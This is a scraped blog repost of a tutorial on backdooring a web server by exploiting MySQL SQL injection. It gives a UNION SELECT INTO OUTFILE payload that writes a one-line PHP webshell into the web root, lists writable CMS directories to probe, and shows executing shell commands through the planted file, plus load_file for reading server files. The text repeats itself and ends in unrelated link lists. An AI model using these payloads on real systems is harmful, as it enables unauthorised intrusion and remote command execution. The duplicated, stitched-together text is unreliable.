Backdoor Webserver using MySQL-SQL Injection
来源:互联网 发布:ubuntu 搜狗 乱码 编辑:程序博客网 时间:2024/06/08 20:12
What is SQL Injection?
SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.
For example, the following SQL command is used to validate user login requests:
Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files
MySQL has a built-in command that can be used to create and write system files. This command has the following format:
mysq> select "text" INTO OUTFILE "file.txt"
One big drawback of this command is that it can be appended to an existing query using UNION SQL token.
For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'
select user, password from user where user="admin" and password="123" union select "text",2 into outfile "/tmp/file.txt" -- '
As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files
MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.
mysql> select load_file("PATH_TO_FILE");
Webshell
Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands. Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):
<? system($_REQUEST['cmd']); ?>
For example, in the following screenshot, id command is executed
Webshell - id command
Attack Scenario
1. Find SQL injection
It is out of the scope of this document. You must first find SQL injection.
2. Find a directory with write permission
To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:
hxxp://www.target.com/templates_compiled/
hxxp://www.target.com/templates_c/
hxxp://www.target.com/templates/
hxxp://www.target.com/temporary/
hxxp://www.target.com/images/
hxxp://www.target.com/cache/
hxxp://www.target.com/temp/
hxxp://www.target.com/files/
In our example we will use a temp directory.
3. Exploit SQL injection - create web shell
You need to append the following string to the legitimate SQL command:
UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:
2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
/var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
temp is a directory with full write access. In your case it could be a different directory.
The above command will write the query's result with the"<? system($_REQUEST['cmd']); ?>" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!
4. Execute shell commands
Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:
hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND
For example:
SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.
For example, the following SQL command is used to validate user login requests:
$sql_query = "select * from users where user='$user' and password='$pass'"
$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'"
Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files
MySQL has a built-in command that can be used to create and write system files. This command has the following format:
mysq> select "text" INTO OUTFILE "file.txt"
One big drawback of this command is that it can be appended to an existing query using UNION SQL token.
For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'
select user, password from user where user="admin" and password="123" union select "text",2 into outfile "/tmp/file.txt" -- '
As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files
MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.
mysql> select load_file("PATH_TO_FILE");
Webshell
Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands. Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):
<? system($_REQUEST['cmd']); ?>
For example, in the following screenshot, id command is executed
Webshell - id command
Attack Scenario
1. Find SQL injection
It is out of the scope of this document. You must first find SQL injection.
2. Find a directory with write permission
To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:
hxxp://www.target.com/templates_compiled/
hxxp://www.target.com/templates_c/
hxxp://www.target.com/templates/
hxxp://www.target.com/temporary/
hxxp://www.target.com/images/
hxxp://www.target.com/cache/
hxxp://www.target.com/temp/
hxxp://www.target.com/files/
In our example we will use a temp directory.
3. Exploit SQL injection - create web shell
You need to append the following string to the legitimate SQL command:
UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:
2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
/var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
temp is a directory with full write access. In your case it could be a different directory.
The above command will write the query's result with the"<? system($_REQUEST['cmd']); ?>" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!
4. Execute shell commands
Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:
hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND
For example:
hxxp://www.target.com/temp/c.php?cmd=id
- Backdoor Webserver using MySQL-SQL Injection
- Creating Backdoors Using SQL Injection
- SQL Injection with MySQL
- SQL Injection with MySQL
- mysql sql injection
- MySQL and SQL Injection
- Linux - mysql sql injection
- Faster Blind MySQL Injection Using Bit Shifting
- Faster Blind MySQL Injection Using Bit Shifting
- Mysql BackDoor
- Advanced SQL Injection with MySQL
- Advanced SQL Injection with MySQL
- Advanced SQL Injection with MySQL
- MySQL SQL Injection Cheat Sheet
- MySQL SQL Injection Cheat Sheet
- Mysql注入:SQL Injection with MySQL
- Using Database Caches to Detect SQL injection (SecTor 2009)
- How to Hack a WordPress Site using SQL Injection
- 手把手教你把Vim改装成一个IDE编程环境(图文)
- JSP学习笔记-03-Servlet和JSP的关系
- [转] Redis几个认识误区
- 使用jad反编译java文件批量
- Oracle DBA全攻略
- Backdoor Webserver using MySQL-SQL Injection
- linux 解压文件到指定目录
- 备忘录
- Sql导入导出时候 无法在只读列中插入数据
- hive资料整理系列 六 hive 配置
- Anroid图片格式转换程序(winXP+cygwin+opencv+ndk)
- exescope使用
- Unity2.0学习笔记-Unity2.0基础-如何配置Unity2.0容器-设计时配置
- hibernate_jpa